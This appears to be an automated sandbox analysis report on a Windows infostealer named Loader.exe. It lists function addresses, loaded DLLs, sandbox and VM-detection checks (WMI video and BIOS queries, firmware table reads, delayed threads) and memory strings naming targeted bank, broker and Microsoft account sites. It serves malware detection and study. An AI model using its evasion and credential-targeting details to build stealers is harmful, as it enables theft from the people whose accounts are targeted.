                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000360C00_2_000360C0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0006F8C00_2_0006F8C0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0007A0C00_2_0007A0C0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000760E70_2_000760E7
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000568E00_2_000568E0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0004B0F00_2_0004B0F0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000500F00_2_000500F0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000441000_2_00044100
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000859100_2_00085910
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000481200_2_00048120
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0006D9200_2_0006D920
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0002D9300_2_0002D930
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0004C9300_2_0004C930
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0005A9300_2_0005A930
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000299600_2_00029960
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000531600_2_00053160
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000731600_2_00073160
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0004D9700_2_0004D970
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0007C1700_2_0007C170
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000359800_2_00035980
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000779800_2_00077980
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000401A00_2_000401A0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0005E1B00_2_0005E1B0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0004A9D00_2_0004A9D0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000649E00_2_000649E0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000339F00_2_000339F0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0002B2000_2_0002B200
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00031A000_2_00031A00
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00053A000_2_00053A00
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0005D2000_2_0005D200
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0005B2000_2_0005B200
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0007BA200_2_0007BA20
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0007CA300_2_0007CA30
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000862300_2_00086230
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0006EA400_2_0006EA40
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000462600_2_00046260
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00051A700_2_00051A70
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0005EA700_2_0005EA70
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00076A700_2_00076A70
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0007F2700_2_0007F270
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0005BA800_2_0005BA80
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00072A800_2_00072A80
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0004BA900_2_0004BA90
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000592900_2_00059290
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00062AA00_2_00062AA0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000322B00_2_000322B0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000762B30_2_000762B3
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00074AB00_2_00074AB0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0007A2B00_2_0007A2B0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000802B00_2_000802B0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000562C00_2_000562C0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0002AAD60_2_0002AAD6
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000532D00_2_000532D0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0006BAD00_2_0006BAD0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0003F2E00_2_0003F2E0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00035B200_2_00035B20
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0003FB200_2_0003FB20
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00044B600_2_00044B60
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0004A3600_2_0004A360
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000773600_2_00077360
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000A33620_2_000A3362
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000333700_2_00033370
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00032B900_2_00032B90
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000253B00_2_000253B0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000343B00_2_000343B0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000453B00_2_000453B0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00052BB00_2_00052BB0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00060BD00_2_00060BD0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000373F00_2_000373F0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00038BF00_2_00038BF0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000254060_2_00025406
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00058C100_2_00058C10
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000494200_2_00049420
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000724200_2_00072420
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000704300_2_00070430
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000414400_2_00041440
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000734500_2_00073450
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00028C550_2_00028C55
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00056C800_2_00056C80
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0002A4900_2_0002A490
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0007E4900_2_0007E490
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00087C900_2_00087C90
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0007DCB00_2_0007DCB0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00033CC00_2_00033CC0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0005F4C00_2_0005F4C0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000A14E80_2_000A14E8
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00031CF00_2_00031CF0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000814F00_2_000814F0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0004A5000_2_0004A500
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0005C5000_2_0005C500
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00064D100_2_00064D10
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0006C5100_2_0006C510
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0007B5100_2_0007B510
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0003FD300_2_0003FD30
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000315400_2_00031540
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00044D400_2_00044D40
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000485400_2_00048540
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000755400_2_00075540
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00034D600_2_00034D60
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0007BD600_2_0007BD60
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000515700_2_00051570
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0005AD700_2_0005AD70
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00074D800_2_00074D80
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000865800_2_00086580
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00063D900_2_00063D90
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0002FDB00_2_0002FDB0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00056DB00_2_00056DB0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0007D5B00_2_0007D5B0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000805B00_2_000805B0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0004E5C00_2_0004E5C0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00073DC00_2_00073DC0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0003F5D00_2_0003F5D0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000395D00_2_000395D0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00075DD00_2_00075DD0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0002E5E00_2_0002E5E0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0004ADE00_2_0004ADE0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000565F00_2_000565F0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0006D5F00_2_0006D5F0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000446000_2_00044600
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00082E300_2_00082E30
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000886300_2_00088630
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0002B6500_2_0002B650
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00054E500_2_00054E50
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00088E500_2_00088E50
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000416600_2_00041660
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0002D6700_2_0002D670
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0005A6700_2_0005A670
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000346800_2_00034680
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0004BE800_2_0004BE80
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00049E900_2_00049E90
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00053E900_2_00053E90
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000656900_2_00065690
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000296A00_2_000296A0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000646A00_2_000646A0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000406B00_2_000406B0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000596B00_2_000596B0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0003A6C00_2_0003A6C0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0008B6D20_2_0008B6D2
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000747100_2_00074710
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000787200_2_00078720
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0007EF400_2_0007EF40
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000767480_2_00076748
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0003C7500_2_0003C750
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000537500_2_00053750
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0002CF5B0_2_0002CF5B
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0007CF800_2_0007CF80
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0004E7A00_2_0004E7A0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000627A00_2_000627A0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00048FC00_2_00048FC0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00055FC00_2_00055FC0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00076FD00_2_00076FD0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0002E7E00_2_0002E7E0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0005B7F00_2_0005B7F0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_00D6F51C2_3_00D6F51C
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_00D6F50D2_3_00D6F50D
                Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 0008BBE0 appears 49 times
                Source: Loader.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Loader.exeStatic PE information: Section: .bss ZLIB complexity 1.0003222795163584
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/0@13/4
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7616:120:WilError_03
                Source: C:\Users\user\Desktop\Loader.exeCommand line argument: y0_2_00097940
                Source: Loader.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\Loader.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: Loader.exe, 00000002.00000003.1518122386.0000000003494000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1488455652.00000000034CC000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1488988393.0000000003486000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Loader.exeVirustotal: Detection: 32%
                Source: Loader.exeReversingLabs: Detection: 28%
                Source: C:\Users\user\Desktop\Loader.exeFile read: C:\Users\user\Desktop\Loader.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"
                Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"
                Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: Loader.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0008BD9A push ecx; ret 0_2_0008BDAD
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_00DEB6DA pushad ; retf 2_3_00DEB6F9
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_00DEB4ED push ds; retf 2_3_00DEB509
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_00DEA9ED pushfd ; ret 2_3_00DEAA03
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_00DE9BE1 push ebp; ret 2_3_00DE9C43
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_00DEB5BD push es; retf 2_3_00DEB5C9
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_00DEB75A push edx; retf 2_3_00DEB769
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_00DEB57C push cs; retf 2_3_00DEB589
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_00DEB778 push eax; retf 2_3_00DEB779
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_00DEB51D push ds; retf 2_3_00DEB509
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_00DEB73F push esp; retf 2_3_00DEB759
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_00DEB53D push ss; retf 2_3_00DEB549
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_00DE9737 push ebx; iretd 2_3_00DE9761
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_00DDAAF9 push ss; ret 2_3_00DDAB2B
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_00DD9EF4 push esi; ret 2_3_00DD9EFB
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_00DDF8EE push es; ret 2_3_00DDF90C
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_00DDF8EE push es; ret 2_3_00DDF90C
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_00DDD8A8 push ds; ret 2_3_00DDD8D3
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_00DDD8A8 push ds; ret 2_3_00DDD8D3
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_00DDA0AA pushad ; ret 2_3_00DDA0AB
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_00DDFAA0 pushad ; retf 2_3_00DDFAA9
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_00DDFAA0 pushad ; retf 2_3_00DDFAA9
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_00DDD992 push es; ret 2_3_00DDD993
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_00DDD992 push es; ret 2_3_00DDD993
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_00DDEB82 push bp; ret 2_3_00DDEB84
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_00DDEB82 push bp; ret 2_3_00DDEB84
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_00DDF7AC push 1800DEC9h; retf 2_3_00DDF79D
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_00DDF7AC push 1800DEC9h; retf 2_3_00DDF79D
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_00DDD758 push ebx; ret 2_3_00DDD73B
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_00DDD758 push ebx; ret 2_3_00DDD73B
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_00DDF74F push 1800DEC9h; retf 2_3_00DDF79D
                Source: Loader.exeStatic PE information: section name: .text entropy: 7.102077354688428
                Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                Source: C:\Users\user\Desktop\Loader.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Query firmware table information (likely to detect VMs)
                Source: C:\Users\user\Desktop\Loader.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_00DDD2ED sldt word ptr [eax]2_3_00DDD2ED
                Source: C:\Users\user\Desktop\Loader.exeWindow / User API: threadDelayed 4353Jump to behavior
                Source: C:\Users\user\Desktop\Loader.exe TID: 7836Thread sleep time: -210000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Loader.exe TID: 3188Thread sleep count: 4353 > 30Jump to behavior
                Source: C:\Users\user\Desktop\Loader.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\Desktop\Loader.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\Loader.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0009DAAE FindFirstFileExW,0_2_0009DAAE
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0009DB5F FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_0009DB5F
                Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                Source: Loader.exe, 00000002.00000003.1519076725.00000000034BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
                Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: Loader.exe, Loader.exe, 00000002.00000003.1687807478.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244391216.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1644894647.0000000000D7A000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2665753957.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1587677507.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1620380906.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2544370381.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2544255250.0000000000D7D000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1620222186.0000000000D7A000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2665667377.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1435518173.0000000000D7C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
